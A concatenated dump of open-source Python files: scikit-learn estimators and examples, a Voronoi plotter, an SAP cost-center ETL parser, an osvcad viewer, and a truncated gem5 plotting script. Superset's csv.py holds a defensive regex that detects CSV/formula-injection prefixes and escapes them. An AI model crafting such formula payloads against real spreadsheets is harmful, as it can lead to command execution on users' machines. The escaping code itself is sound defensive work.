If False, the regressors X are assumed to be already normalized.
max_iter : integer, optional
Maximum numbers of iterations to perform, therefore maximum features
to include. 10% of ``n_features`` but at least 5 if available.
cv : cross-validation generator, optional
see :mod:`sklearn.cross_validation`. If ``None`` is passed, default to
a 5-fold strategy
n_jobs : integer, optional
Number of CPUs to use during the cross validation. If ``-1``, use
all the CPUs
verbose : boolean or integer, optional
Sets the verbosity amount
Attributes
----------
`n_nonzero_coefs_` : int
Estimated number of non-zero coefficients giving the best mean
squared error over the cross-validation folds.
`coef_` : array, shape (n_features,) or (n_features, n_targets)
parameter vector (w in the problem formulation).
`intercept_` : float or array, shape (n_targets,)
independent term in decision function.
See also
--------
orthogonal_mp
orthogonal_mp_gram
lars_path
Lars
LassoLars
OrthogonalMatchingPursuit
LarsCV
LassoLarsCV
decomposition.sparse_encode
"""
def __init__(self, copy=True, fit_intercept=True, normalize=True,
max_iter=None, cv=None, n_jobs=1, verbose=False):
self.copy = copy
self.fit_intercept = fit_intercept
self.normalize = normalize
self.max_iter = max_iter
self.cv = cv
self.n_jobs = n_jobs
self.verbose = verbose
def fit(self, X, y):
"""Fit the model using X, y as training data.
Parameters
----------
X : array-like, shape [n_samples, n_features]
Training data.
y : array-like, shape [n_samples]
Target values.
Returns
-------
self : object
returns an instance of self.
"""
X = array2d(X)
X, y = check_arrays(X, y)
cv = check_cv(self.cv, X, y, classifier=False)
max_iter = (min(max(int(0.1 * X.shape[1]), 5), X.shape[1])
if not self.max_iter
else self.max_iter)
cv_paths = Parallel(n_jobs=self.n_jobs, verbose=self.verbose)(
delayed(_omp_path_residues)(
X[train], y[train], X[test], y[test], self.copy,
self.fit_intercept, self.normalize, max_iter)
for train, test in cv)
min_early_stop = min(fold.shape[0] for fold in cv_paths)
mse_folds = np.array([(fold[:min_early_stop] ** 2).mean(axis=1)
for fold in cv_paths])
best_n_nonzero_coefs = np.argmin(mse_folds.mean(axis=0)) + 1
self.n_nonzero_coefs_ = best_n_nonzero_coefs
omp = OrthogonalMatchingPursuit(n_nonzero_coefs=best_n_nonzero_coefs,
copy_X=None,
fit_intercept=self.fit_intercept,
normalize=self.normalize)
omp.fit(X, y)
self.coef_ = omp.coef_
self.intercept_ = omp.intercept_
return self
| bsd-3-clause |
mwv/scikit-learn | examples/applications/plot_prediction_latency.py | 234 | 11277 | """
==================
Prediction Latency
==================
This is an example showing the prediction latency of various scikit-learn
estimators.
The goal is to measure the latency one can expect when doing predictions
either in bulk or atomic (i.e. one by one) mode.
The plots represent the distribution of the prediction latency as a boxplot.
"""
# Authors: Eustache Diemert <eustache@diemert.fr>
# License: BSD 3 clause
from __future__ import print_function
from collections import defaultdict
import time
import gc
import numpy as np
import matplotlib.pyplot as plt
from scipy.stats import scoreatpercentile
from sklearn.datasets.samples_generator import make_regression
from sklearn.ensemble.forest import RandomForestRegressor
from sklearn.linear_model.ridge import Ridge
from sklearn.linear_model.stochastic_gradient import SGDRegressor
from sklearn.svm.classes import SVR
def _not_in_sphinx():
# Hack to detect whether we are running by the sphinx builder
return '__file__' in globals()
def atomic_benchmark_estimator(estimator, X_test, verbose=False):
"""Measure runtime prediction of each instance."""
n_instances = X_test.shape[0]
runtimes = np.zeros(n_instances, dtype=np.float)
for i in range(n_instances):
instance = X_test[i, :]
start = time.time()
estimator.predict(instance)
runtimes[i] = time.time() - start
if verbose:
print("atomic_benchmark runtimes:", min(runtimes), scoreatpercentile(
runtimes, 50), max(runtimes))
return runtimes
def bulk_benchmark_estimator(estimator, X_test, n_bulk_repeats, verbose):
"""Measure runtime prediction of the whole input."""
n_instances = X_test.shape[0]
runtimes = np.zeros(n_bulk_repeats, dtype=np.float)
for i in range(n_bulk_repeats):
start = time.time()
estimator.predict(X_test)
runtimes[i] = time.time() - start
runtimes = np.array(list(map(lambda x: x / float(n_instances), runtimes)))
if verbose:
print("bulk_benchmark runtimes:", min(runtimes), scoreatpercentile(
runtimes, 50), max(runtimes))
return runtimes
def benchmark_estimator(estimator, X_test, n_bulk_repeats=30, verbose=False):
"""
Measure runtimes of prediction in both atomic and bulk mode.
Parameters
----------
estimator : already trained estimator supporting `predict()`
X_test : test input
n_bulk_repeats : how many times to repeat when evaluating bulk mode
Returns
-------
atomic_runtimes, bulk_runtimes : a pair of `np.array` which contain the
runtimes in seconds.
"""
atomic_runtimes = atomic_benchmark_estimator(estimator, X_test, verbose)
bulk_runtimes = bulk_benchmark_estimator(estimator, X_test, n_bulk_repeats,
verbose)
return atomic_runtimes, bulk_runtimes
def generate_dataset(n_train, n_test, n_features, noise=0.1, verbose=False):
"""Generate a regression dataset with the given parameters."""
if verbose:
print("generating dataset...")
X, y, coef = make_regression(n_samples=n_train + n_test,
n_features=n_features, noise=noise, coef=True)
X_train = X[:n_train]
y_train = y[:n_train]
X_test = X[n_train:]
y_test = y[n_train:]
idx = np.arange(n_train)
np.random.seed(13)
np.random.shuffle(idx)
X_train = X_train[idx]
y_train = y_train[idx]
std = X_train.std(axis=0)
mean = X_train.mean(axis=0)
X_train = (X_train - mean) / std
X_test = (X_test - mean) / std
std = y_train.std(axis=0)
mean = y_train.mean(axis=0)
y_train = (y_train - mean) / std
y_test = (y_test - mean) / std
gc.collect()
if verbose:
print("ok")
return X_train, y_train, X_test, y_test
def boxplot_runtimes(runtimes, pred_type, configuration):
"""
Plot a new `Figure` with boxplots of prediction runtimes.
Parameters
----------
runtimes : list of `np.array` of latencies in micro-seconds
cls_names : list of estimator class names that generated the runtimes
pred_type : 'bulk' or 'atomic'
"""
fig, ax1 = plt.subplots(figsize=(10, 6))
bp = plt.boxplot(runtimes, )
cls_infos = ['%s\n(%d %s)' % (estimator_conf['name'],
estimator_conf['complexity_computer'](
estimator_conf['instance']),
estimator_conf['complexity_label']) for
estimator_conf in configuration['estimators']]
plt.setp(ax1, xticklabels=cls_infos)
plt.setp(bp['boxes'], color='black')
plt.setp(bp['whiskers'], color='black')
plt.setp(bp['fliers'], color='red', marker='+')
ax1.yaxis.grid(True, linestyle='-', which='major', color='lightgrey',
alpha=0.5)
ax1.set_axisbelow(True)
ax1.set_title('Prediction Time per Instance - %s, %d feats.' % (
pred_type.capitalize(),
configuration['n_features']))
ax1.set_ylabel('Prediction Time (us)')
plt.show()
def benchmark(configuration):
"""Run the whole benchmark."""
X_train, y_train, X_test, y_test = generate_dataset(
configuration['n_train'], configuration['n_test'],
configuration['n_features'])
stats = {}
for estimator_conf in configuration['estimators']:
print("Benchmarking", estimator_conf['instance'])
estimator_conf['instance'].fit(X_train, y_train)
gc.collect()
a, b = benchmark_estimator(estimator_conf['instance'], X_test)
stats[estimator_conf['name']] = {'atomic': a, 'bulk': b}
cls_names = [estimator_conf['name'] for estimator_conf in configuration[
'estimators']]
runtimes = [1e6 * stats[clf_name]['atomic'] for clf_name in cls_names]
boxplot_runtimes(runtimes, 'atomic', configuration)
runtimes = [1e6 * stats[clf_name]['bulk'] for clf_name in cls_names]
boxplot_runtimes(runtimes, 'bulk (%d)' % configuration['n_test'],
configuration)
def n_feature_influence(estimators, n_train, n_test, n_features, percentile):
"""
Estimate influence of the number of features on prediction time.
Parameters
----------
estimators : dict of (name (str), estimator) to benchmark
n_train : nber of training instances (int)
n_test : nber of testing instances (int)
n_features : list of feature-space dimensionality to test (int)
percentile : percentile at which to measure the speed (int [0-100])
Returns:
--------
percentiles : dict(estimator_name,
dict(n_features, percentile_perf_in_us))
"""
percentiles = defaultdict(defaultdict)
for n in n_features:
print("benchmarking with %d features" % n)
X_train, y_train, X_test, y_test = generate_dataset(n_train, n_test, n)
for cls_name, estimator in estimators.items():
estimator.fit(X_train, y_train)
gc.collect()
runtimes = bulk_benchmark_estimator(estimator, X_test, 30, False)
percentiles[cls_name][n] = 1e6 * scoreatpercentile(runtimes,
percentile)
return percentiles
def plot_n_features_influence(percentiles, percentile):
fig, ax1 = plt.subplots(figsize=(10, 6))
colors = ['r', 'g', 'b']
for i, cls_name in enumerate(percentiles.keys()):
x = np.array(sorted([n for n in percentiles[cls_name].keys()]))
y = np.array([percentiles[cls_name][n] for n in x])
plt.plot(x, y, color=colors[i], )
ax1.yaxis.grid(True, linestyle='-', which='major', color='lightgrey',
alpha=0.5)
ax1.set_axisbelow(True)
ax1.set_title('Evolution of Prediction Time with #Features')
ax1.set_xlabel('#Features')
ax1.set_ylabel('Prediction Time at %d%%-ile (us)' % percentile)
plt.show()
def benchmark_throughputs(configuration, duration_secs=0.1):
"""benchmark throughput for different estimators."""
X_train, y_train, X_test, y_test = generate_dataset(
configuration['n_train'], configuration['n_test'],
configuration['n_features'])
throughputs = dict()
for estimator_config in configuration['estimators']:
estimator_config['instance'].fit(X_train, y_train)
start_time = time.time()
n_predictions = 0
while (time.time() - start_time) < duration_secs:
estimator_config['instance'].predict(X_test[0])
n_predictions += 1
throughputs[estimator_config['name']] = n_predictions / duration_secs
return throughputs
def plot_benchmark_throughput(throughputs, configuration):
fig, ax = plt.subplots(figsize=(10, 6))
colors = ['r', 'g', 'b']
cls_infos = ['%s\n(%d %s)' % (estimator_conf['name'],
estimator_conf['complexity_computer'](
estimator_conf['instance']),
estimator_conf['complexity_label']) for
estimator_conf in configuration['estimators']]
cls_values = [throughputs[estimator_conf['name']] for estimator_conf in
configuration['estimators']]
plt.bar(range(len(throughputs)), cls_values, width=0.5, color=colors)
ax.set_xticks(np.linspace(0.25, len(throughputs) - 0.75, len(throughputs)))
ax.set_xticklabels(cls_infos, fontsize=10)
ymax = max(cls_values) * 1.2
ax.set_ylim((0, ymax))
ax.set_ylabel('Throughput (predictions/sec)')
ax.set_title('Prediction Throughput for different estimators (%d '
'features)' % configuration['n_features'])
plt.show()
###############################################################################
# main code
start_time = time.time()
# benchmark bulk/atomic prediction speed for various regressors
configuration = {
'n_train': int(1e3),
'n_test': int(1e2),
'n_features': int(1e2),
'estimators': [
{'name': 'Linear Model',
'instance': SGDRegressor(penalty='elasticnet', alpha=0.01,
l1_ratio=0.25, fit_intercept=True),
'complexity_label': 'non-zero coefficients',
'complexity_computer': lambda clf: np.count_nonzero(clf.coef_)},
{'name': 'RandomForest',
'instance': RandomForestRegressor(),
'complexity_label': 'estimators',
'complexity_computer': lambda clf: clf.n_estimators},
{'name': 'SVR',
'instance': SVR(kernel='rbf'),
'complexity_label': 'support vectors',
'complexity_computer': lambda clf: len(clf.support_vectors_)},
]
}
benchmark(configuration)
# benchmark n_features influence on prediction speed
percentile = 90
percentiles = n_feature_influence({'ridge': Ridge()},
configuration['n_train'],
configuration['n_test'],
[100, 250, 500], percentile)
plot_n_features_influence(percentiles, percentile)
# benchmark throughput
throughputs = benchmark_throughputs(configuration)
plot_benchmark_throughput(throughputs, configuration)
stop_time = time.time()
print("example run in %.2fs" % (stop_time - start_time))
| bsd-3-clause |
mistercrunch/panoramix | superset/utils/csv.py | 2 | 3022 | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import re
import urllib.request
from typing import Any, Dict, Optional
from urllib.error import URLError
import pandas as pd
negative_number_re = re.compile(r"^-[0-9.]+$")
# This regex will match if the string starts with:
#
# 1. one of -, @, +, |, =, %
# 2. two double quotes immediately followed by one of -, @, +, |, =, %
# 3. one or more spaces immediately followed by one of -, @, +, |, =, %
#
problematic_chars_re = re.compile(r'^(?:"{2}|\s{1,})(?=[\-@+|=%])|^[\-@+|=%]')
def escape_value(value: str) -> str:
"""
Escapes a set of special characters.
http://georgemauer.net/2017/10/07/csv-injection.html
"""
needs_escaping = problematic_chars_re.match(value) is not None
is_negative_number = negative_number_re.match(value) is not None
if needs_escaping and not is_negative_number:
# Escape pipe to be extra safe as this
# can lead to remote code execution
value = value.replace("|", "\\|")
# Precede the line with a single quote. This prevents
# evaluation of commands and some spreadsheet software
# will hide this visually from the user. Many articles
# claim a preceding space will work here too, however,
# when uploading a csv file in Google sheets, a leading
# space was ignored and code was still evaluated.
value = "'" + value
return value
def df_to_escaped_csv(df: pd.DataFrame, **kwargs: Any) -> Any:
escape_values = lambda v: escape_value(v) if isinstance(v, str) else v
# Escape csv headers
df = df.rename(columns=escape_values)
# Escape csv rows
df = df.applymap(escape_values)
return df.to_csv(**kwargs)
def get_chart_csv_data(
chart_url: str, auth_cookies: Optional[Dict[str, str]] = None
) -> Optional[bytes]:
content = None
if auth_cookies:
opener = urllib.request.build_opener()
cookie_str = ";".join([f"{key}={val}" for key, val in auth_cookies.items()])
opener.addheaders.append(("Cookie", cookie_str))
response = opener.open(chart_url)
content = response.read()
if response.getcode() != 200:
raise URLError(response.getcode())
if content:
return content
return None
| apache-2.0 |
jeffkinnison/awe-wq | lib/python2.7/site-packages/awe/voronoi.py | 2 | 3930 | #!/usr/bin/env python
# -----------------------------------------------------------------------------
# Voronoi diagram from a list of points
# Copyright (C) 2011 Nicolas P. Rougier
#
# Distributed under the terms of the BSD License.
# -----------------------------------------------------------------------------
import numpy as np
import matplotlib
import matplotlib.pyplot as plt
from matplotlib.patches import Polygon
from matplotlib.collections import PatchCollection
def circumcircle(P1, P2, P3):
'''
Return center of the circle containing P1, P2 and P3
If P1, P2 and P3 are colinear, return None
Adapted from:
http://local.wasp.uwa.edu.au/~pbourke/geometry/circlefrom3/Circle.cpp
'''
delta_a = P2 - P1
delta_b = P3 - P2
if np.abs(delta_a[0]) <= 0.000000001 and np.abs(delta_b[1]) <= 0.000000001:
center_x = 0.5*(P2[0] + P3[0])
center_y = 0.5*(P1[1] + P2[1])
else:
aSlope = delta_a[1]/delta_a[0]
bSlope = delta_b[1]/delta_b[0]
if np.abs(aSlope-bSlope) <= 0.000000001:
return None
center_x= (aSlope*bSlope*(P1[1] - P3[1]) + bSlope*(P1[0] + P2 [0]) \
- aSlope*(P2[0]+P3[0]))/(2.*(bSlope-aSlope))
center_y = -(center_x - (P1[0]+P2[0])/2.)/aSlope + (P1[1]+P2[1])/2.
return center_x, center_y
def voronoi(X,Y):
''' Return line segments describing the voronoi diagram of X and Y '''
P = np.zeros((X.size+4,2))
P[:X.size,0], P[:Y.size,1] = X, Y
# We add four points at (pseudo) "infinity"
m = max(np.abs(X).max(), np.abs(Y).max())*1e5
P[X.size:,0] = -m, -m, +m, +m
P[Y.size:,1] = -m, +m, -m, +m
D = matplotlib.tri.Triangulation(P[:,0],P[:,1])
T = D.triangles
#axes = plt.subplot(1,1,1)
#plt.scatter(X,Y, s=5)
#patches = []
#for i,triang in enumerate(T):
# polygon = Polygon(np.array([P[triang[0]],P[triang[1]],P[triang[2]]]))
# patches.append(polygon)
#colors = 100*np.random.rand(len(patches))
#p = PatchCollection(patches, cmap=matplotlib.cm.jet, alpha=0.4)
#p.set_array(np.array(colors))
#axes.add_collection(p)
#plt.colorbar(p)
##lines = matplotlib.collections.LineCollection(segments, color='0.75')
##axes.add_collection(lines)
#plt.axis([0,1,0,1])
#plt.show()
#plt.savefig('test0.png')
n = T.shape[0]
C = np.zeros((n,2))
for i in range(n):
C[i] = circumcircle(P[T[i,0]],P[T[i,1]],P[T[i,2]])
X,Y = C[:,0], C[:,1]
#segments = []
#for i in range(n):
# for k in D.neighbors[i]:
# if k != -1:
# segments.append([(X[i],Y[i]), (X[k],Y[k])])
cells = [[] for i in range(np.max(T)+1)]
for i,triang in enumerate(T):
cells[triang[0]].append([X[i],Y[i]])
cells[triang[1]].append([X[i],Y[i]])
cells[triang[2]].append([X[i],Y[i]])
for i,cell in enumerate(cells):
angle = []
for coord in cell:
angle.append(np.arctan2((coord[1]-P[i,1]),(coord[0]-P[i,0])))
id = np.argsort(-np.array(angle))
cells[i] = np.array([cell[j] for j in id])
return cells
# -----------------------------------------------------------------------------
if __name__ == '__main__':
P = np.random.random((2,256))
X,Y = P[0],P[1]
fig = plt.figure(figsize=(10,10))
axes = plt.subplot(1,1,1)
plt.scatter(X,Y, s=5)
#segments = voronoi(X,Y)
cells = voronoi(X,Y)
patches = []
for cell in cells:
polygon = Polygon(cell,True)
patches.append(polygon)
#plt.scatter(cell[:,0],cell[:,1])
colors = 100*np.random.rand(len(patches))
print colors
p = PatchCollection(patches, cmap=matplotlib.cm.jet, alpha=0.4)
p.set_array(np.array(colors))
axes.add_collection(p)
plt.colorbar(p)
#lines = matplotlib.collections.LineCollection(segments, color='0.75')
#axes.add_collection(lines)
plt.axis([0,1,0,1])
plt.show()
plt.savefig('test.png')
| gpl-2.0 |
plissonf/scikit-learn | examples/ensemble/plot_gradient_boosting_oob.py | 230 | 4762 | """
======================================
Gradient Boosting Out-of-Bag estimates
======================================
Out-of-bag (OOB) estimates can be a useful heuristic to estimate
the "optimal" number of boosting iterations.
OOB estimates are almost identical to cross-validation estimates but
they can be computed on-the-fly without the need for repeated model
fitting.
OOB estimates are only available for Stochastic Gradient Boosting
(i.e. ``subsample < 1.0``), the estimates are derived from the improvement
in loss based on the examples not included in the bootstrap sample
(the so-called out-of-bag examples).
The OOB estimator is a pessimistic estimator of the true
test loss, but remains a fairly good approximation for a small number of trees.
The figure shows the cumulative sum of the negative OOB improvements
as a function of the boosting iteration. As you can see, it tracks the test
loss for the first hundred iterations but then diverges in a
pessimistic way.
The figure also shows the performance of 3-fold cross validation which
usually gives a better estimate of the test loss
but is computationally more demanding.
"""
print(__doc__)
# Author: Peter Prettenhofer <peter.prettenhofer@gmail.com>
#
# License: BSD 3 clause
import numpy as np
import matplotlib.pyplot as plt
from sklearn import ensemble
from sklearn.cross_validation import KFold
from sklearn.cross_validation import train_test_split
# Generate data (adapted from G. Ridgeway's gbm example)
n_samples = 1000
random_state = np.random.RandomState(13)
x1 = random_state.uniform(size=n_samples)
x2 = random_state.uniform(size=n_samples)
x3 = random_state.randint(0, 4, size=n_samples)
p = 1 / (1.0 + np.exp(-(np.sin(3 * x1) - 4 * x2 + x3)))
y = random_state.binomial(1, p, size=n_samples)
X = np.c_[x1, x2, x3]
X = X.astype(np.float32)
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.5,
random_state=9)
# Fit classifier with out-of-bag estimates
params = {'n_estimators': 1200, 'max_depth': 3, 'subsample': 0.5,
'learning_rate': 0.01, 'min_samples_leaf': 1, 'random_state': 3}
clf = ensemble.GradientBoostingClassifier(**params)
clf.fit(X_train, y_train)
acc = clf.score(X_test, y_test)
print("Accuracy: {:.4f}".format(acc))
n_estimators = params['n_estimators']
x = np.arange(n_estimators) + 1
def heldout_score(clf, X_test, y_test):
"""compute deviance scores on ``X_test`` and ``y_test``. """
score = np.zeros((n_estimators,), dtype=np.float64)
for i, y_pred in enumerate(clf.staged_decision_function(X_test)):
score[i] = clf.loss_(y_test, y_pred)
return score
def cv_estimate(n_folds=3):
cv = KFold(n=X_train.shape[0], n_folds=n_folds)
cv_clf = ensemble.GradientBoostingClassifier(**params)
val_scores = np.zeros((n_estimators,), dtype=np.float64)
for train, test in cv:
cv_clf.fit(X_train[train], y_train[train])
val_scores += heldout_score(cv_clf, X_train[test], y_train[test])
val_scores /= n_folds
return val_scores
# Estimate best n_estimator using cross-validation
cv_score = cv_estimate(3)
# Compute best n_estimator for test data
test_score = heldout_score(clf, X_test, y_test)
# negative cumulative sum of oob improvements
cumsum = -np.cumsum(clf.oob_improvement_)
# min loss according to OOB
oob_best_iter = x[np.argmin(cumsum)]
# min loss according to test (normalize such that first loss is 0)
test_score -= test_score[0]
test_best_iter = x[np.argmin(test_score)]
# min loss according to cv (normalize such that first loss is 0)
cv_score -= cv_score[0]
cv_best_iter = x[np.argmin(cv_score)]
# color brew for the three curves
oob_color = list(map(lambda x: x / 256.0, (190, 174, 212)))
test_color = list(map(lambda x: x / 256.0, (127, 201, 127)))
cv_color = list(map(lambda x: x / 256.0, (253, 192, 134)))
# plot curves and vertical lines for best iterations
plt.plot(x, cumsum, label='OOB loss', color=oob_color)
plt.plot(x, test_score, label='Test loss', color=test_color)
plt.plot(x, cv_score, label='CV loss', color=cv_color)
plt.axvline(x=oob_best_iter, color=oob_color)
plt.axvline(x=test_best_iter, color=test_color)
plt.axvline(x=cv_best_iter, color=cv_color)
# add three vertical lines to xticks
xticks = plt.xticks()
xticks_pos = np.array(xticks[0].tolist() +
[oob_best_iter, cv_best_iter, test_best_iter])
xticks_label = np.array(list(map(lambda t: int(t), xticks[0])) +
['OOB', 'CV', 'Test'])
ind = np.argsort(xticks_pos)
xticks_pos = xticks_pos[ind]
xticks_label = xticks_label[ind]
plt.xticks(xticks_pos, xticks_label)
plt.legend(loc='upper right')
plt.ylabel('normalized loss')
plt.xlabel('number of iterations')
plt.show()
| bsd-3-clause |
rtogo/sap-cost-center-hierarchy | ksh3.py | 1 | 3297 | # -*- coding: utf-8 -*-
import logging
log = logging.getLogger(__name__)
import pandas as pd
import numpy as np
import os
import yaml
class ETL(object):
def __init__(self, path, config_filename='de-para.yml'):
self.path = path
self.config_filename = config_filename
self.df = pd.DataFrame()
self.profile = pd.DataFrame()
self.extract()
self.transform()
self.quality_check()
def extract(self):
self.df = pd.read_csv(self.path, encoding='latin-1', sep='\t',
header=0, dtype=str)
self.df.columns = ['SAP']
with open(self.config_filename, encoding='utf-8') as stream:
self.config = yaml.load(stream)
def transform(self):
# Extrai colunas usando regex
self.df[['nivel', 'hierarquia', 'descricao']] = \
self.df.SAP.str.extract('^([\s\-|]+)([\w\d\-]+)(\s{6}.+$|$)')
self.df.drop('SAP', axis=1, inplace=True)
# Remove linhas onde qualquer campo for null
self.df.dropna(axis=0, how='any', inplace=True)
# Remove espaços excedentes
self.df.descricao = self.df.descricao.apply(lambda x: x.strip())
self.df.descricao = self.df.descricao.apply(
lambda x: np.nan if x == '' else x)
# Remove as linhas sem descrição
self.df.dropna(subset=['descricao'], how='any', inplace=True)
# Conta os pipes para saber o nível de cada hierarquia
self.df.nivel = self.df.nivel.apply(
lambda x: str(x).count('|')).astype(np.int16)
# Reseta index para ficar com um número sequencial
self.df.reset_index(drop=True, inplace=True)
# Renomeia hierarquias conforme de->para no arquivo de configuração
for k, v in self.config['Hierarquia de centros de custo'].items():
self.df.loc[self.df.hierarquia == k, 'descricao'] = v
# Denormaliza hierarquia
level_1 = None
level_2 = None
for i in self.df.index:
row = self.df.loc[i].copy()
last_row = self.df.shift(1).ix[i].copy()
if row['nivel'] == 1 and row['descricao'] != level_1:
level_1 = row['descricao']
# log.info(' > Lendo hierarquia {!r}'.format(row['descricao']))
if row['nivel'] == 2 and row['descricao'] != level_2:
level_2 = row['descricao']
log.info(' > Lendo hierarquia {!s} :: {!s}'.
format(level_1, level_2))
nivel_hierarquia = 'nivel_{!s}_hierarquia'.format(row['nivel'])
nivel_descricao = 'nivel_{!s}_descricao'.format(row['nivel'])
self.df.loc[i, nivel_hierarquia] = row['hierarquia']
self.df.loc[i, nivel_descricao] = row['descricao']
for l in range(1, row['nivel']):
nivel_hierarquia = 'nivel_{!s}_hierarquia'.format(l)
nivel_descricao = 'nivel_{!s}_descricao'.format(l)
self.df.loc[i, nivel_hierarquia] = last_row[nivel_hierarquia]
self.df.loc[i, nivel_descricao] = last_row[nivel_descricao]
def quality_check(self):
pass
def parse(path):
log.info('Importando ksh3')
parser = ETL(path)
return parser.df
| mit |
osv-team/osvcad | osvcad/view.py | 1 | 4586 | # coding: utf-8
r"""Visualization of Parts and Assemblies"""
from random import uniform, randint
import wx
import wx.aui
import wx.lib.agw.aui
import matplotlib.pyplot as plt
import networkx as nx
from OCC.Core.gp import gp_Pnt, gp_Vec
import ccad.display as cd
from aocutils.display.wx_viewer import Wx3dViewerFrame, colour_wx_to_occ
class OsvCadFrame(Wx3dViewerFrame):
r"""Specialization of aocutil's Wx3dViewerFrame for OsvCad"""
def __init__(self):
Wx3dViewerFrame.__init__(self,
title="OsvCad 3d viewer",
welcome="Starting OsvCad 3d viewer ...")
def display_part(self, part, color_255=None, transparency=0.):
r"""Display a single Part (shape + anchors)
Parameters
----------
part : PartGeometryNode
color_255 : tuple of integers from 0 to 255
transparency : float from 0 to 1
"""
if color_255 is None:
color_255 = (randint(0, 255), randint(0, 255), randint(0, 255))
for k, _ in part.anchors.items():
self.wx_3d_viewer.display_vector(
gp_Vec(*part.anchors[k]["direction"]),
gp_Pnt(*part.anchors[k]["position"]))
self.wx_3d_viewer.display_shape(part.node_shape.shape,
color_=colour_wx_to_occ(color_255),
transparency=transparency)
def display_assembly(self, assembly, transparency=0.):
r"""Display an assembly of parts and assemblies
Parameters
----------
assembly : AssemblyGeometryNode
transparency : float from 0 to 1
"""
assembly.build()
for node in assembly.nodes():
# for k, v in node.anchors.items():
# frame.p.display_vector(gp_Vec(*node.anchors[k]["direction"]),
# gp_Pnt(*node.anchors[k]["position"]))
self.wx_3d_viewer.display_shape(node.node_shape.shape,
color_=colour_wx_to_occ((randint(0, 255),
randint(0, 255),
randint(0, 255))),
transparency=transparency)
# parts
def view_part(part, color_255=None, transparency=0.):
r"""Display the node in a 3D viewer
Parameters
----------
part : PartGeometryNode
color_255 : Tuple[float, float, float]
8-bit (0 - 255) color tuple
transparency : float
From 0. (not transparent) to 1 (fully transparent)
"""
if color_255 is None:
color_255 = (randint(0, 255), randint(0, 255), randint(0, 255))
app = wx.App()
frame = OsvCadFrame()
frame.display_part(part, color_255, transparency)
app.SetTopWindow(frame)
app.MainLoop()
# assemblies
def view_assembly(assembly):
r"""Display using osvcad's integrated wx viewer"""
assembly.build()
app = wx.App()
frame = OsvCadFrame()
frame.display_assembly(assembly)
app.SetTopWindow(frame)
app.MainLoop()
def view_assembly_graph(assembly):
r"""Create a Matplotlib graph of the plot
Parameters
----------
assembly : AssemblyGeometryNode
"""
val_map = {'A': 1.0,
'D': 0.5714285714285714,
'H': 0.0}
values = [val_map.get(node, 0.25) for node in assembly.nodes()]
pos = nx.circular_layout(assembly)
nx.draw_networkx_nodes(assembly,
pos,
cmap=plt.get_cmap('jet'),
node_color=values)
nx.draw_networkx_edges(assembly,
pos,
edgelist=assembly.edges(),
edge_color='r',
arrows=True)
nx.draw_networkx_labels(assembly, pos)
nx.draw_networkx_edge_labels(assembly, pos)
plt.show()
def view_assembly_ccad(assembly):
r"""Display the Assembly in a the ccad 3D viewer
Parameters
----------
assembly : AssemblyGeometryNode
"""
v = cd.view()
assembly.build()
for node in assembly.nodes():
v.display(node._node_shape,
color=(uniform(0, 1), uniform(0, 1), uniform(0, 1)),
transparency=0.)
# v.display(assembly._node_shape,
# color=(uniform(0, 1), uniform(0, 1), uniform(0, 1)),
# transparency=0.)
cd.start()
| gpl-3.0 |
aclifton/cpeg853-gem5 | util/dram_lat_mem_rd_plot.py | 13 | 5155 | #!/usr/bin/env python
# Copyright (c) 2015 ARM Limited
# All rights reserved
#
# The license below extends only to copyright in the software and shall
# not be construed as granting a license to any other intellectual
# property including but not limited to intellectual property relating
# to a hardware implementation of the functionality of the software
# licensed hereunder. You may use the software subject to the license
# terms below provided that you ensure that this notice is replicated
# unmodified and in its entirety in all distributions of the software,
# modified or unmodified, in source code or in binary form.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met: redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer;
# redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution;
# neither the name of the copyright holders nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# Authors: Andreas Hansson
try:
import matplotlib.pyplot as plt
import matplotlib as mpl
import numpy as np
except ImportError:
print "Failed to import matplotlib and numpy"
exit(-1)
import sys
import re
# This script is intended to post process and plot the output from
# running configs/dram/lat_mem_rd.py, as such it parses the simout and
# stats.txt to get the relevant data points.
def main():
if len(sys.argv) != 2:
print "Usage: ", sys.argv[0], "<simout directory>"
exit(-1)
try:
stats = open(sys.argv[1] + '/stats.txt', 'r')
except IOError:
print "Failed to open ", sys.argv[1] + '/stats.txt', " for reading"
exit(-1)
try:
simout = open(sys.argv[1] + '/simout', 'r')
except IOError:
print "Failed to open ", sys.argv[1] + '/simout', " for reading"
exit(-1)
# Get the address ranges
got_ranges = False
ranges = []
iterations = 1
for line in simout:
if got_ranges:
ranges.append(int(line) / 1024)
match = re.match("lat_mem_rd with (\d+) iterations, ranges:.*", line)
if match:
got_ranges = True
iterations = int(match.groups(0)[0])
simout.close()
if not got_ranges:
